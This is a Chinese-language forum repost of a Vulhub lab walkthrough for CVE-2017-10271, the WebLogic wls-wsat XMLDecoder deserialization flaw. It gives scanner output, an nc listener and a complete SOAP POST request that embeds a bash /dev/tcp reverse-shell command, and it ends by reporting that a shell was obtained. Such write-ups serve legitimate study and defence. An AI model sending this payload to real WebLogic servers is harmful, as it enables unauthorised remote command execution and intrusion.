阳光之夏 发表于 2023-9-5 22:18:04

weblogic-10.3.6-'wls-wsat'-XMLDecoder反序列化漏洞-(CVE-2017-10

目录

[*]1.1、漏洞描述
[*]1.2、漏洞等级
[*]1.3、影响版本
[*]1.4、漏洞复现

[*]1、基础环境
[*]2、漏洞扫描
[*]nacs
[*]weblogicScanner
[*]3、漏洞验证


说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)漏洞评级高危影响范围10.3.6漏洞描述Weblogic的WLS Security组件对外提供webservice服务
其中使用了XMLDecoder来解析用户传入的XML数据
在解析的过程中出现反序列化漏洞,导致可执行任意命令修复方案打补丁
上设备
升级组件1.1、漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令
1.2、漏洞等级

高危
1.3、影响版本

10.3.6
1.4、漏洞复现

1、基础环境

Path:Vulhub/weblogic/CVE-2017-10271
启动测试环境:
sudo docker-compose up -d等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。
Weblogic的登陆地址是your-ip:7001/console

2、漏洞扫描

nacs

查看帮助信息
./nacs -h
┌──(kali㉿kali)-[~/tools/nacs/0.0.3]
└─$ sudo ./nacs -h 192.168.80.141 -pa 7001
__   ___   ___   ___   
| \| |   /   \   / __|   / __|
| .|   | - || (__    \__ \
|_|\_|   |_|_|   \___|   |___/
             Version: 0.0.3
Start to probe alive machines
[*] Target 192.168.80.141 is alive
There are total of 1 hosts, and 1 are surviving
Too few surviving hosts
Start to discover the ports
[*] ssh://192.168.80.141:22
[*] http://192.168.80.141:7001
A total of 2 targets, the rule base hits 2 targets
Start to send pocs to web services (xray type)
Load 397 xray poc(s)
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2729-2
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2725 v10
[+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2017-10271 reverse
Start to process nonweb services
ssh 192.168.80.141
Task finish, consumption of time: 3m35.385936144s                                                                      weblogicScanner

项目地址:https://github.com/0xn0ne/weblogicScanner
┌──(kali㉿kali)-[~/tools/weblogic/weblogicScanner]
└─$ python ws.py -t 192.168.80.141                                    
[-] Not found.
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[-] Not vulnerability.
[-] Not vulnerability.
[!] Connection error.
[-] Not vulnerability.
[-] Not vulnerability.
[-] Not vulnerability.
[-] Not vulnerability.
[+] Found module, Please verify manually!
[+] Found module, Please verify manually!
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[+] Exists vulnerability!
[+] Found module, Please verify manually!
[!] Connection error.
[-] Not vulnerability.
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[+] Exists vulnerability!
[-] Not vulnerability.
[-] Not found.
[-] Not vulnerability.
Run completed, 27 seconds total.3、漏洞验证

访问/wls-wsat/CoordinatorPortType页面

改变请求方式为post

kali监听21端口
nc -lvp 21发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.80.141:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=vq4hk23V21rs9yG5nGTvYkGppFGmFrvzzM2tvtw2pSnKQCsjPmvt!-1799840789
Connection: close
Content-Type: text/xml
Content-Length: 641

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" >
<void >
<arraylength="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.80.141/21 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>成功获取shell


来源:https://www.cnblogs.com/saury/archive/2023/09/05/17680974.html
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: weblogic-10.3.6-'wls-wsat'-XMLDecoder反序列化漏洞-(CVE-2017-10